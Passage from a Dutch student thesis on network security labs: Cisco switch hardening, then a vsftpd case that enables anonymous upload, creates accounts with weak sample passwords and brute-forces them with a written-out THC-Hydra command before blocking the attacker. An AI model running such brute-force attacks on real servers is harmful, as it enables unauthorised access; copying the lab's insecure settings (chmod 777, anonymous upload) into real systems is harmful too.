6.1 Switchport port security Je kan switchport security instellen en ervoor zorgen dat er maar een maximum aantal MAC-adressen aangeleerd kunnen worden op één switchpoort.
Met de volgende commando’s stel je in dat er een maximum van 10 MAC-adressen per poort aangeleerd kunnen worden. Als het deze 10 poorten probeert te overschrijden dan zal er een SNMP bericht naar de netwerk administrator gestuurd worden waardoor deze automatisch op de hoogte gebracht wordt van de situatie.
Commando’s om switchport security in te stellen:
enable conf t interface fa0/1 switchport port-security switchport port-security maximum 10 switchport port-security restrict end copy run start
6.2 Dynamic ARP-inspection Je kan dynamic ARP-inspection instellen, dit zal de MAC-adressen mappen aan een IP-adres. Hierdoor zullen de reply’s die je stuurt om aan ARP-poisoning te doen niet doorgelaten worden en dus hun eindbestemming niet bereiken.
Om dynamic ARP-inspection toe te passen zal je moeten werken met VLAN’s, je zal dan per VLAN deze inspectie instellen. De link tussen de switches zet je op trust zodat die ARP-pakketten niet gecontroleerd worden.
Commando’s om dynamic arp-inspection in te stellen:
enable conf t ip arp inspection <vlan nummer> interface gig0/1 ip arp inspection trust end copy run start Bron: http://www.cisco.com/en/US/docs/switches/lan/catalyst3550/software/release/12.2_25_see/configuration/guide/swdynarp.html
122
© Nathan Boone
6.3 SSH in plaats van Telnet Telnet is een protocol dat je beter niet meer gebruikt, er zijn andere alternatieven zoals SSH die de pakketten zal encrypteren voordat deze op het netwerk gestuurd worden.
Om SSH in te stellen zal je eerst een hostname en een domain-name moeten instellen. Je zal dit moeten doen omdat beide gebruikt worden bij het genereren van de keys. Deze keys worden gebruikt bij het encrypteren van de pakketten. Als volgt moet je de keys aanmaken. Ten laatste zorg je ervoor dat enkel SSH toegelaten wordt voor remote access.
Commando’s om SSH in te stellen:
enable conf t hostname HoofdRouter ip domain-name hoofdrouter.cisco.com crypto key generate rsa line vty 0 4 transport input ssh end copy run start
7 Conclusie Als een hacker echt wil, zal hij zo goed als altijd wel een manier vinden om je netwerk af te luisteren. Hierdoor is het aangeraden om ervoor te zorgen dat je altijd encryptie gebruikt om de pakketten op je netwerk te encrypteren.
Telnet is een onveilig protocol dat eigenlijk niet meer zou mogen gebruikt worden. In plaats hiervan zou je altijd SSH moeten gebruiken omdat er bij SSH encryptie gebeurt. Als er dan toch iemand in slaagt om verkeer op je netwerk af te luisteren dan kan hij niets doen met die pakketten omdat deze geëncrypteerd zijn.
123
© Nathan Boone
Pagina opzettelijk blanco gelaten
124
© Nathan Boone
Case 3: FTP beheren en aanvallen 1 Inleiding FTP (File Transfer Protocol)-servers worden in bedrijven vaak gebruikt om bestanden te delen, die tevens extern kunnen geraadpleegd worden. De taak van een netwerkbeheerder is om de FTP-server toegankelijk te maken voor werknemers, en tegelijk de veiligheid te bewaren zodat onbevoegde personen de server niet kunnen binnendringen.
De manier waarop dit gedaan wordt is door bepaalde configuraties te maken waardor we accounts verkrijgen, die daarna door bepaalde gebruikers kunnen gebruikt worden en deze te beveiligen met een wachtwoord.
2 Benodigdheden Toestel IP-adres
FTP server 192.168.0.121/24
FTP client 192.168.0.221/24
2.1 FTP server Hiervoor gebruiken we een VirtualBox met Linux Mint versie 2.6/3.x.
De software die we gaan gebruiken noemt "vsftpd" en is een standaard geworden voor Linux FTP servers.
2.2 FTP client Om de toegang te vergemakkelijken gebruiken we geen FTP client software, maar een normale webbrowser zoals Mozilla Firefox voor Linux. We behouden de VirtualBox met Linux Mint versie 2.6/3.x
3 Objectieven 1. FTP server installeren en configureren 2. FTP server configureren voor anonieme toegang 3. Logging inschakelen 4. Server proberen kraken 5. Conclusies trekken 6. Anonieme toegang uitschakelen en accounts aanmaken 7. Server proberen kraken 8. Conclusies trekken
125
© Nathan Boone
4 Stappenplan In dit stappenplan zal besproken worden hoe een FTP server kan geconfigureerd en geraadpleegd worden. Daarnaast bekijken we ook de verschillende gradaties van veiligheid dat men kan instellen op een FTP server en welke mogelijkheden er bestaan om een FTP server te kraken. De pogingen worden zo goed mogelijk in de gaten gehouden door alles te loggen.
1. FTP server installeren en configureren
Eerst en vooral worden we "superuser" door het commando su in te geven zonder extra parameters. Nadat we het wachtwoord hebben ingegeven kunnen we de vsftpd package installeren m.b.v. het apt-get install vsftpd commando.
Vervolgens gaan we naar het configuratiebestand voor vsftpd om te kijken wat we allemaal kunnen configureren. vim is een tekstverwerker dat toelaat bestanden te openen en aan te passen. Het bestand dat we willen aanpassen bevind zich in de /etc/ folder bij alle andere configuratiebestanden onder de naam vsftpd.conf.
Hieronder bespreken we wat we gaan configureren en waarvoor alles dient. De drie puntjes (...) is waar tekst is weggelaten die onnodig is voor deze case.
# Example config file /etc/vsftpd.conf ... # Run standalone? vsftpd can run either from an inetd or as a standalone # daemon started from an initscript. listen=YES ... Hier zeggen we dat we de vsftpd daemon als intiscript starten. Wat dit wil zeggen is dat de FTP server opgestart wordt van zodra het systeem is opgestart. We stellen dit in zodat we zeker weten dat de FTP server zal opstarten.
126
© Nathan Boone
... # Make sure PORT transfer connections originate from port 20 (ftp-data). connect_from_port_20=YES ... Er moet opgemerkt worden dat het nodig is om routers in te stellen zodat ze aan port forwarding doen op poort 20 en 21 (TCP), anders kan het IP-adres van de server niet geforward worden.
# It is recommended that you define on your system a unique user which the # ftp server can use as a totally isolated and unprivileged user. nopriv_user=ftpsecure Om toch enigszins volgens een standaard te werken, is het best om een geïsoleerde gebruiker aan te maken zonder rechten dat de FTP server kan gebruiken. In dit voorbeeld maken we de gebruiker ftpsecure aan door het commando useradd te gebruiken.
Vervolgens geven we hem een wachtwoord met passwd, anders zal de gebruiker niet kunnen gebruikt worden.
... # You may fully customise the login banner string: ftpd_banner=Welcome to FTP test service. ... Voor de volledigheid veranderen we ook de banner die een gebruiker ziet eenmaal hij ingelogd is.
2. FTP server configureren voor anonieme toegang ... # Allow anonymous FTP? (Disabled by default) anonymous_enable=YES ... Ook deze optie stellen we in om te kijken of we de server kunnen bereiken en welke gevaren er schuilen bij het inschakelen van deze optie. Als we echter via een webbrowser anoniem proberen in te loggen krijgen we nog steeds een fout. Dit is omdat webbrowsers onnodig twee maal controleren of er een wachtwoord vereist is.
127
© Nathan Boone
Normaal zou dit scherm niet mogen verschijnen als anonieme login ingeschakeld staat
Om dit te omzeilen gebruiken we een optie die niet in de standaardconfiguratie aanwezig is.
... no_anon_password=YES ... Dit zorgt ervoor dat er ook met webbrowsers anoniem kan worden ingelogd.
... # Uncomment this to allow local users to log in. local_enable=NO ... We zetten voorlopig de mogelijkheid om in te loggen met lokale accounts uit, omdat we eerst anoniem gaan inloggen.
... # Uncomment this to allow the anonymous FTP user to upload files. This only # has an effect if the above global write enable is activated. Also, you will # obviously need to create a directory writable by the FTP user. anon_upload_enable=YES # # Uncomment this if you want the anonymous FTP user to be able to create # new directories. anon_mkdir_write_enable=YES ... Hier schakelen we in dat de anonieme gebruikers bestanden kan uploaden en directories kan maken.
128
© Nathan Boone
3. Logging inschakelen Om logging in te schakelen stellen we de vsftpd configuratiefile als volgt in:
... # Activate logging of uploads/downloads. xferlog_enable=YES ... # You may override where the log file goes if you like. The default is shown # below. xferlog_file=/var/log/vsftpd.log ...
Dit is nog niet genoeg, vermits de file /var/log/vsftpd.log nog niet aangemaakt is en de nodige rechten heeft gekregen. We maken het bestand aan met touch /var/log/vsftpd.log en vervolgens passen we de bevoegdheden aan met chmod 777. Dit laatste zorgt ervoor dat elke gebruiker op het bestand kan schrijven en lezen.
129
© Nathan Boone
Als test loggen we anoniem in op de FTP server, eenmaal lokaal en de andere keer op een host.
Met cat bekijken we de inhoud van een file.
De eerste regel van de logfile laat zien dat er een client met IP-adres 192.168.0.212 heeft kunnen verbinden met de server. De regel daaronder geeft weer dat er met anonieme logingegevens is gewerkt. De derde regel zegt ons dat er in de folder /opendir/ een bestand is gedownload, namelijk TEST123.txt.
Daaronder gebeurt hetzelfde, maar dan in de default folder en het bestand 0123Test.txt. Tevens kunnen we hier zien dat er lokaal is gewerkt, omdat 127.0.0.1 het adres van de localhost is. Dit is m.a.w. het adres van de FTP server.
130
© Nathan Boone
4. Server proberen kraken Anonieme toegang hoeft helemaal niet gekraakt te worden. Het enige wat moet verkregen worden is het IP-adres van de FTP server zodat er kan mee geconnecteerd worden. Door footprinting en scanning toe te passen zou dit geen probleem mogen zijn.
Als er een goede DMZ ingesteld is en de FTP server enkel lokaal gebruikt zal worden, dan hoeft hier geen extra beveiliging toegepast te worden.
5. Conclusies trekken Pluspunt: Iedereen kan aan de bestanden op de server.
Minpunt: Iedereen kan aan de bestanden op de server.
6. Anonieme toegang uitschakelen, configuratie aanpassen en accounts aanmaken Anonieme toegang uitschakelen is even terugkijken naar wat er eerder geconfigureerd is geweest en dit ongedaan maken
... # Allow anonymous FTP? (Disabled by default) anonymous_enable=NO ... # Uncomment this to allow local users to log in. local_enable=YES ...
Nog een veiligheidstip is om de tijd aan te passen wanneer een sessie waarop ingelogd is te doen verstrijken.
... #You may change the default value for timing out an idle session. idle_session_timeout=600 # # You may change the default value for timing out a data connection. data_connection_timeout=120 ... Hieronder specificiëren we de RSA certificaten en sleutel dat we gebruiken voor SSL, dat connecties zal encrypteren zodat wachtwoorden niet zo makkelijk kunnen worden afgeluisterd.
# This option specifies the location of the RSA certificate to use for SSL # encrypted connections. rsa_cert_file=/etc/ssl/certs/ssl-cert-snakeoil.pem # This option specifies the location of the RSA key to use for SSL # encrypted connections. rsa_private_key_file=/etc/ssl/private/ssl-cert-snakeoil.key Nu we de veiligheid een beetje achter handen hebben maken we de verschillende accounts aan.
131
© Nathan Boone
We gebruiken hiervoor deze template:
Gebruikersnaam Wachtwoord
User001 X1234a
User002 X1235b
User003 X1236c
User004 X1237d
User005 X1238e
User006 X1239f
User007 azerty
User008 azerty
User009 azerty
User010 azerty
Gebruikers aanmaken doet men met het commando useradd, waarna een wachtwoord kan ingesteld worden met eventuele persoonlijke informatie. Hieronder een voorbeeld:
132
© Nathan Boone
Even controleren of alle gebruikers aangemaakt zijn:
De volgende stap is de configuratiefile weer aanpassen om een lijst van lokale gebruikers te gebruiken als gebruikers voor de FTP server. Dit zijn de variabelen die we moeten aanpassen:
... chroot_list_enable=YES allow_writeable_chroot=YES ... Deze twee variabelen zorgen ervoor dat de FTP server een lijst van lokale gebruikers zal hanteren om de login's te regelen. De locatie van deze lijst is /etc/vsftpd.chroot_list. Hier hoeven er enkel de gebruikersnamen te staan van degenen die mogen inloggen. Wachtwoorden zijn hetzelfde als de lokale varianten.
We verwijderen alle logs die we tot nu toe hebben gemaakt en we kijken wat er gebeurt als we proberen inloggen.
De poging is succesvol.
Nu proberen we anoniem in te loggen door geen gebruikersnaam en wachtwoord in te geven.
Het anoniem inloggen lukt niet meer.
7. Server proberen kraken Een manier om op de FTP server te geraken, ook al is anonieme login uitgeschakeld, is om te brute-forcen. We gaan in deze case ervan uit dat de aanvaller is kunnen binnendringen in het hoofdgebouw
133
© Nathan Boone
van het bedrijf en enkele foto's heeft kunnen nemen van nota's die op het bureau van de netwerkadministrator lagen.
Na het installeren van THC-Hydra passen we de brute-forcing toe. Dit is wat we tot nu toe weten:
• Het IP-adres van de FTP server is 192.168.0.121 • Gebruikersnamen gaan van "user001" tot "user010" • Wachtwoorden variëren van "X1234a" tot "azerty"
Met deze informatie gaan we een stapje verder en proberen we binnen te geraken.
Met het commando ./hydra host_address ftp -L gebruikers.txt -P wachtwoorden.txt kan het brute-forcen beginnen. De data staat in de juiste documenten en het aangepaste commando luidt als volgt:
./hydra 192.168.0.121 ftp -L /home/adminuser/Desktop/gebruikers -P /home/adminuser/Desktop/wachtwoorden
134
© Nathan Boone
We zijn binnen.
Wat ziet de netwerkbeheerder nu aan zijn kant? We bekijken voor een laatste maal de logging.
Hier klopt iets niet
Eenmaal de netwerkbeheerder door heeft wat er aan de hand is kunnen er maatregelen getroffen worden. Het weigeren van een connectie door een bepaald IP-adres bijvoorbeeld. Dit gaan we als voorbeeld manueel doen, maar hier kunnen scripts voor geschreven worden.
135
© Nathan Boone
Door in /etc/hosts.deny een nieuwe regel toe te voegen kunnen we de toegang van de aanvaller stopzetten. Dit is de nieuwe regel dat zal toegevoegd worden:
vsftpd : 192.168.0.212 We kijken of dit iets heeft uitgeholpen aan de pogingen van de aanvaller:
De hacker kan niet meer inloggen.
5 Conclusie De hacker is binnengeraakt door brute-forcing toe te passen, met informatie die hij verkregen heeft door slimme Footprinting toe te passen. De lessen die hier kunnen uit geleerd worden is om nooit wachtwoorden op te schrijven, zelfs niet als de gebruikersnaam ontbreekt.
Het configureren van een FTP server brengt met zich mee dat er steeds aan gevaren van buitenaf moet gedacht worden vooraleer de server online komt te staan. De schade in het voorbeeld is reeds gedaan, de hacker weet welke gebruikersnamen werken en welke wachtwoorden er gebruikt worden. Een simpele verandering van zijn IP-adres doet genoeg om verder te gaan met het infiltreren.
136
© Nathan Boone
Bibliografie 1 Websites http://www.watchguard.com/infocenter/editorial/135324.asp
http://www.watchguard.com/archive/files/images/ARPpoison3.jpg
http://www.cisco.com/en/US/docs/switches/lan/catalyst3550/software/release/12.2_25_see/configuration/guide/swdynarp.html
http://www.diffen.com/difference/TCP_vs_UDP
http://www.plixer.com/blog/scrutinizer/the-null-scan-you%E2%80%99re-being-watched/
http://www.networkuptime.com/nmap/page3-13.shtml
http://www.networkuptime.com/nmap/page3-14.shtml
http://nmap.org/book/man-port-scanning-techniques.html
http://wiki.dreamhost.com/Troubleshooting_Hacked_Sites#Looking_world-writable_directories
http://en.wikipedia.org/wiki/Honeypot_%28computing%29
https://sc1.checkpoint.com/documents/R77/CP_R77_VPN_AdminGuide/13847.htm
https://supportforums.cisco.com/docs/DOC-8125, http://en.wikipedia.org/wiki/IPsec#Security_association
http://en.wikipedia.org/wiki/Internet_Security_Association_and_Key_Management_Protocol, http://cisco-vpn.org.ua/1587051044/ch08lev1sec1.html
http://nl.wikipedia.org/wiki/Diffie-Hellman-sleuteluitwisselingsprotocol
http://compnetworking.about.com/cs/wireless80211/a/aa80211standard.htmFrequenties
https://discussions.apple.com/thread/2632171, http://compnetworking.about.com/cs/wireless80211/a/aa80211standard.htm
http://en.wikipedia.org/wiki/IEEE_802.11i-2004
http://www.watchguard.com/infocenter/editorial/135324.asp
http://www.watchguard.com/archive/files/images/ARPpoison3.jpg
http://www.cisco.com/en/US/docs/switches/lan/catalyst3550/software/release/12.2_25_see/configuration/guide/swdynarp.html
2 Boeken Keith Barker en Scott Morris. (2013). CCNA Security 640-554 Official Cert Guide.
Stuart McClure, Joel Scrambray, George Kurtz. (2012). Hacking Exposed 7
137
© Nathan Boone
Timesheets 1 Tijdstabel Hacking Exposed
Tijdstabel Hacking Exposed Tijbesteding Plaats Dag Beginuur Einduur Gespendeerde uren Totaal uren
Uitleg gekregen over bachlorproef en wat er van ons verwacht wordt
Klas 23/sep 16.00 u. 18.00 u. 2.00 u. 2.00 u.
Uitleg gekregen over bachlorproef en wat er van ons verwacht wordt
Klas 24/sep 14.00 u. 16.00 u. 2.00 u. 4.00 u.
Lijst van mogelijke prover overlopen. Overzicht maken van proeven waar ik in geïntresseerd ben en hier 3 plaatsen uitkiezen
Klas 25/sep 14.00 u. 18.00 u. 4.00 u. 8.00 u.
De 3 uitgekozen plaatsen contacteren Klas 27/sep 14.00 u. 18.00 u. 4.00 u. 12.00 u. Beginnen aan de PID Klas 30/sep 16.00 u. 18.00 u. 2.00 u. 14.00 u. Presentatie en tekst opstellen Klas 2/okt 14.00 u. 18.00 u. 4.00 u. 18.00 u. Verdere uitleg gekregen over PID en eindwerk Klas 3/okt 14.00 u. 16.00 u. 2.00 u. 20.00 u. Presentatie geven over de gekozen bachlorproef Klas 4/okt 14.00 u. 18.00 u. 4.00 u. 24.00 u. Dualboot geconfigureerd op laptop Thuis 5/okt 17.00 u. 23.00 u. 6.00 u. 30.00 u. Geëxperimenteerd met Backtrack 5 r3 Thuis 6/okt 14.00 u. 18.00 u. 4.00 u. 34.00 u. Afspraak met iMinds Klas 7/okt 16.00 u. 18.00 u. 2.00 u. 36.00 u. Boek Hacking Exposed 7 lezen Klas 8/okt 14.00 u. 16.00 u. 2.00 u. 38.00 u. Werken aan PID Klas 9/okt 14.00 u. 18.00 u. 4.00 u. 42.00 u. Werken aan PID Klas 10/okt 14.00 u. 16.00 u. 2.00 u. 44.00 u.
138
© Nathan Boone
Document opstellen met 10 mogelijke manier om te hacken, een korte beschrijving en een oplossing om dit tegen te gaan
Klas 11/okt 14.00 u. 18.00 u. 4.00 u. 48.00 u.
Werken aan PID Klas 16/okt 14.00 u. 18.00 u. 4.00 u. 52.00 u. Lezen in boek Hacking Exposed 7: H1 Footprinting Klas 17/okt 14.00 u. 16.00 u. 2.00 u. 54.00 u. Lezen in boek Hacking Exposed 7: H1 Footprinting Klas 18/okt 14.00 u. 18.00 u. 4.00 u. 58.00 u. Lezen in boek Hacking Exposed 7: H1 Footprinting Klas 21/okt 16.00 u. 18.00 u. 2.00 u. 60.00 u. Lezen in boek Hacking Exposed 7: H2 Scanning Klas 22/okt 14.00 u. 16.00 u. 2.00 u. 62.00 u. Lezen in boek Hacking Exposed 7: H2 Scanning Klas 23/okt 14.00 u. 18.00 u. 4.00 u. 66.00 u. Lezen in boek Hacking Exposed 7: H2 Scanning Klas 24/okt 14.00 u. 16.00 u. 2.00 u. 68.00 u. Deliverable Stap 1 maken op een kladblad Klas 25/okt 14.00 u. 18.00 u. 4.00 u. 72.00 u. Lezen in boek Hacking Exposed 7: H2 Scanning Klas 6/nov 14.00 u. 18.00 u. 4.00 u. 76.00 u. Deliverable Footprinting Stap 1 Klas 7/nov 14.00 u. 16.00 u. 2.00 u. 78.00 u. Deliverable Footprinting Stap 1 Thuis 8/nov 11.00 u. 12.00 u. 1.00 u. 79.00 u. Deliverable Footprinting Stap 1 Thuis 8/nov 14.00 u. 16.00 u. 2.00 u. 81.00 u. Deliverable Footprinting Stap 1 Thuis 8/nov 19.00 u. 20.00 u. 1.00 u. 82.00 u. Deliverable Footprinting Stap 1 Thuis 11/nov 16.00 u. 18.00 u. 2.00 u. 84.00 u. Lezen in boek Hacking Exposed 7: H3 Enumeration Thuis 12/nov 14.00 u. 16.00 u. 2.00 u. 86.00 u. Superhackaton Voorbereiding School 14/nov 9.00 u. 18.00 u. 9.00 u. 95.00 u. Superhackaton Monitoring School 15/nov 7.30 u. 21.00 u. 13.30 u. 108.30 u. Zoeken naar tijdstabel want tijdstabel verloren Thuis 18/nov 14.00 u. 17.00 u. 3.00 u. 111.30 u. Deliverable Footprinting Stap 1 Thuis 19/nov 17.00 u. 18.00 u. 1.00 u. 112.30 u. Deliverable Footprinting Stap 1 School 20/nov 14.00 u. 18.00 u. 4.00 u. 116.30 u. Lezen in boek Hacking Exposed 7: H3 Enumeration Trein 21/nov 10.00 u. 10.50 u. 0.50 u. 117.20 u. Deliverable Footprinting Stap 1 afgewerkt Thuis 23/nov 14.00 u. 16.00 u. 2.00 u. 119.20 u. Nalezen Deliverable Footprinting Stap 1 Thuis 24/nov 20.00 u. 21.00 u. 1.00 u. 120.20 u. Deliverable Scanning Stap 2 Thuis 25/nov 13.00 u. 14.30 u. 1.30 u. 121.50 u. Deliverable Scanning Stap 2 School 25/nov 16.00 u. 18.00 u. 2.00 u. 123.50 u. Deliverable Scanning Stap 2 Thuis 25/nov 20.00 u. 22.00 u. 2.00 u. 125.50 u.
139
© Nathan Boone
Deliverable Scanning Stap 2 Thuis 26/nov 20.00 u. 22.30 u. 2.30 u. 128.20 u. Deliverable Scanning Stap 2 School 27/nov 13.50 u. 15.40 u. 1.50 u. 130.10 u. Lezen in boek Hacking Exposed 7: H3 Enumeration School 28/nov 8.00 u. 8.40 u. 0.40 u. 130.50 u. Deliverable Scanning Stap 2 School 28/nov 14.00 u. 16.00 u. 2.00 u. 132.50 u. Nalezen Deliverable Footprinting Stap 1 Thuis 29/nov 9.30 u. 11.30 u. 2.00 u. 134.50 u. Lezen in boek Hacking Exposed 7: H3 Enumeration Trein 29/nov 13.00 u. 13.30 u. 0.30 u. 135.20 u. Deliverable Scanning Stap 2 School 29/nov 14.10 u. 14.40 u. 0.30 u. 135.50 u. Gekozen welke cases we zullen uitwerken School 6/dec 14.40 u. 15.30 u. 0.50 u. 136.40 u. Case 1: Scanning en IOS IPS opstellen School 18/dec 14.00 u. 17.30 u. 3.30 u. 140.10 u. Case 3: Afluisteren van netwerkverkeer, telnet afluisteren
School 18/dec 17.30 u. 18.10 u. 0.40 u. 140.50 u.
Case 1: Scanning en IOS IPS opstellen School 19/dec 14.00 u. 18.10 u. 4.10 u. 145.00 u. Case 3: Afluisteren van netwerkverkeer, telnet afluisteren
School 20/dec 10.00 u. 12.30 u. 2.30 u. 147.30 u.
Case 3: Afluisteren van netwerkverkeer, telnet afluisteren
School 20/dec 14.00 u. 17.20 u. 3.20 u. 150.50 u.
Deliverable Scanning Stap 2 Thuis 22/dec 14.00 u. 16.20 u. 2.20 u. 153.10 u. Deliverable Scanning Stap 2 Thuis 22/dec 17.00 u. 18.10 u. 1.10 u. 154.20 u. Deliverable Scanning Stap 2 Thuis 23/dec 11.00 u. 12.30 u. 1.30 u. 155.50 u. Deliverable Scanning Stap 2 Thuis 23/dec 14.00 u. 18.00 u. 4.00 u. 159.50 u. Deliverable Scanning Stap 2 Thuis 23/dec 19.10 u. 22.20 u. 3.10 u. 163.00 u. Deliverable Scanning Stap 2 Thuis 24/dec 10.10 u. 12.30 u. 2.20 u. 165.20 u. Deliverable Scanning Stap 2 Thuis 24/dec 13.40 u. 15.30 u. 1.50 u. 167.10 u. Lezen in boek Hacking Exposed 7: H3 Enumeration Thuis 26/dec 10.00 u. 12.00 u. 2.00 u. 169.10 u. Lezen in boek Hacking Exposed 7: H3 Enumeration Thuis 27/dec 14.00 u. 15.20 u. 1.20 u. 170.30 u. Lezen in boek Hacking Exposed 7: H3 Enumeration Thuis 27/dec 16.00 u. 17.10 u. 1.10 u. 171.40 u. Lezen in boek Hacking Exposed 7: H5 Hacking Unix Thuis 28/dec 10.20 u. 11.40 u. 1.20 u. 173.00 u. Lezen in boek Hacking Exposed 7: H5 Hacking Unix Thuis 28/dec 14.50 u. 16.30 u. 1.40 u. 174.40 u.
140
© Nathan Boone
Lezen in boek Hacking Exposed 7: H7 Remote Connectivity and VoIP Hacking
Thuis 29/dec 11.10 u. 12.30 u. 1.20 u. 176.00 u.
Lezen in boek Hacking Exposed 7: H7 Remote Connectivity and VoIP Hacking
Thuis 29/dec 14.40 u. 16.30 u. 1.50 u. 177.50 u.
Lezen in boek Hacking Exposed 7: H8 Wireless Hacking
Thuis 30/dec 10.30 u. 12.20 u. 1.50 u. 179.40 u.
Lezen in boek Hacking Exposed 7: H8 Wireless Hacking
Thuis 30/dec 16.00 u. 17.50 u. 1.50 u. 181.30 u.
Deliverable Enumeration Stap 3 Thuis 2/jan 14.00 u. 16.00 u. 2.00 u. 183.30 u. Deliverable Enumeration Stap 3 Thuis 2/jan 17.00 u. 19.40 u. 2.40 u. 186.10 u. Deliverable Enumeration Stap 3 Thuis 2/jan 20.00 u. 21.40 u. 1.40 u. 187.50 u. Deliverable Enumeration Stap 3 Thuis 3/jan 9.20 u. 11.40 u. 2.20 u. 190.10 u. Deliverable Enumeration Stap 3 Thuis 3/jan 11.50 u. 12.30 u. 0.40 u. 190.50 u. Deliverable Enumeration Stap 3 Thuis 3/jan 14.00 u. 15.30 u. 1.30 u. 192.20 u. Deliverable Hacking Unix Stap 4 Thuis 3/jan 15.10 u. 16.30 u. 1.20 u. 193.40 u. Deliverable Hacking Unix Stap 4 Thuis 4/jan 9.30 u. 11.20 u. 1.50 u. 195.30 u. Deliverable Hacking Unix Stap 4 Thuis 4/jan 13.00 u. 14.20 u. 1.20 u. 196.50 u. Deliverable Hacking Unix Stap 4 Thuis 4/jan 14.40 u. 15.30 u. 0.50 u. 197.40 u. Deliverable Hacking Unix Stap 4 Thuis 4/jan 16.00 u. 17.20 u. 1.20 u. 199.00 u. Deliverable Hacking Unix Stap 4 Thuis 4/jan 18.00 u. 19.40 u. 1.40 u. 200.40 u. Deliverable Remote Connectivity Stap 5 Thuis 5/jan 9.50 u. 10.40 u. 0.50 u. 201.30 u. Deliverable Remote Connectivity Stap 5 Thuis 5/jan 11.00 u. 12.40 u. 1.40 u. 203.10 u. Deliverable Remote Connectivity Stap 5 Thuis 5/jan 14.10 u. 16.20 u. 2.10 u. 205.20 u. Deliverable Remote Connectivity Stap 5 Thuis 6/jan 11.30 u. 12.40 u. 1.10 u. 206.30 u. Deliverable Remote Connectivity Stap 5 Thuis 6/jan 15.00 u. 16.50 u. 1.50 u. 208.20 u. Deliverable Remote Connectivity Stap 5 Thuis 6/jan 17.20 u. 18.30 u. 1.10 u. 209.30 u. Deliverable Remote Connectivity Stap 5 Thuis 7/jan 9.30 u. 11.40 u. 2.10 u. 211.40 u. Deliverable Wireless Hacking Stap 6 Thuis 7/jan 13.00 u. 14.10 u. 1.10 u. 212.50 u. Deliverable Wireless Hacking Stap 6 Thuis 7/jan 15.00 u. 16.20 u. 1.20 u. 214.10 u.
141
© Nathan Boone
Deliverable Wireless Hacking Stap 6 Thuis 7/jan 16.30 u. 17.50 u. 1.20 u. 215.30 u. Deliverable Wireless Hacking Stap 6 Thuis 7/jan 19.00 u. 21.40 u. 2.40 u. 218.10 u. Deliverable Wireless Hacking Stap 6 Thuis 8/jan 14.20 u. 16.40 u. 2.20 u. 220.30 u. Deliverable Wireless Hacking Stap 6 Thuis 8/jan 17.00 u. 18.30 u. 1.30 u. 222.00 u. Deliverable Wireless Hacking Stap 6 Thuis 8/jan 19.20 u. 21.40 u. 2.20 u. 224.20 u. Case 3: Afluisteren van netwerkverkeer, telnet afluisteren documenteren
Thuis 9/jan 9.30 u. 11.40 u. 2.10 u. 226.30 u.
Case 3: Afluisteren van netwerkverkeer, telnet afluisteren documenteren
Thuis 9/jan 13.20 u. 14.30 u. 1.10 u. 227.40 u.
Case 3: Afluisteren van netwerkverkeer, telnet afluisteren documenteren
Thuis 9/jan 15.00 u. 16.40 u. 1.40 u. 229.20 u.
Case 3: Afluisteren van netwerkverkeer, telnet afluisteren documenteren
Thuis 9/jan 17.10 u. 18.00 u. 0.50 u. 230.10 u.
Case 3: Afluisteren van netwerkverkeer, telnet afluisteren documenteren
Thuis 9/jan 19.10 u. 21.30 u. 2.20 u. 232.30 u.
Werken aan hoofdtekst Thuis 10/jan 9.10 u. 10.40 u. 1.30 u. 234.00 u. Werken aan hoofdtekst Thuis 10/jan 11.00 u. 12.50 u. 1.50 u. 235.50 u. Nalezen Deliverable Scanning Stap 2 Thuis 10/jan 14.00 u. 15.40 u. 1.40 u. 237.30 u. Nalezen Deliverable Scanning Stap 2 Thuis 10/jan 16.00 u. 17.20 u. 1.20 u. 238.50 u. Nalezen Deliverable Scanning Stap 2 Thuis 10/jan 18.00 u. 19.50 u. 1.50 u. 240.40 u. Nalezen Deliverable Enumeration Stap 3 Thuis 11/jan 10.20 u. 11.50 u. 1.30 u. 242.10 u. Nalezen Deliverable Enumeration Stap 3 Thuis 11/jan 13.00 u. 14.50 u. 1.50 u. 244.00 u. Nalezen Deliverable Enumeration Stap3 Thuis 11/jan 15.00 u. 16.20 u. 1.20 u. 245.20 u. Nalezen Deliverable Hacking Unix Stap 4 Thuis 11/jan 16.40 u. 17.50 u. 1.10 u. 246.30 u. Nalezen Deliverable Hacking Unix Stap 4 Thuis 11/jan 18.30 u. 20.20 u. 1.50 u. 248.20 u. Nalezen Deliverable Hacking Unix Stap 4 Thuis 11/jan 20.40 u. 21.50 u. 1.10 u. 249.30 u. Nalezen Deliverable Remote Connectivity Stap 5 Thuis 12/jan 9.10 u. 10.40 u. 1.30 u. 251.00 u. Nalezen Deliverable Remote Connectivity Stap 5 Thuis 12/jan 11.00 u. 13.10 u. 2.10 u. 253.10 u. Nalezen Deliverable Remote Connectivity Stap 5 Thuis 12/jan 15.00 u. 17.20 u. 2.20 u. 255.30 u.
142
© Nathan Boone
Nalezen Deliverable Remote Connectivity Stap 5 Thuis 12/jan 17.30 u. 17.50 u. 0.20 u. 255.50 u. Nalezen Deliverable Remote Connectivity Stap 5 Thuis 12/jan 18.30 u. 20.10 u. 1.40 u. 257.30 u. Nalezen Deliverable Wireless Hacking Stap 6 Thuis 13/jan 9.30 u. 10.40 u. 1.10 u. 258.40 u. Nalezen Deliverable Wireless Hacking Stap 6 Thuis 13/jan 11.00 u. 12.40 u. 1.40 u. 260.20 u. Nalezen Deliverable Wireless Hacking Stap 6 Thuis 13/jan 14.10 u. 16.40 u. 2.30 u. 262.50 u. Nalezen Deliverable Wireless Hacking Stap 6 Thuis 13/jan 17.00 u. 18.10 u. 1.10 u. 264.00 u. Werken aan Hoofdtekst Thuis 14/jan 9.40 u. 12.10 u. 2.30 u. 266.30 u. Werken aan Hoofdtekst Thuis 14/jan 14.10 u. 16.20 u. 2.10 u. 268.40 u. Nalezen van Hoofdteskt Thuis 14/jan 17.00 u. 18.30 u. 1.30 u. 270.10 u. Nalezen van Hoofdteskt Thuis 14/jan 19.00 u. 20.40 u. 1.40 u. 271.50 u. Case 1: Scanning en IOS IPS documenteren Thuis 16/jan 10.20 u. 12.40 u. 2.20 u. 274.10 u. Case 1: Scanning en IOS IPS documenteren Thuis 16/jan 13.30 u. 15.40 u. 2.10 u. 276.20 u. Case 1: Scanning en IOS IPS documenteren Thuis 16/jan 16.00 u. 17.30 u. 1.30 u. 277.50 u. Case 1: Scanning en IOS IPS documenteren Thuis 17/jan 10.20 u. 13.00 u. 2.40 u. 280.30 u. Case 1: Scanning en IOS IPS documenteren Thuis 17/jan 14.10 u. 16.30 u. 2.20 u. 282.50 u. Aan de presentatie werken Thuis 20/jan 14.10 u. 18.10 u. 4.00 u. 286.50 u. Alles in een document plaatsen Thuis 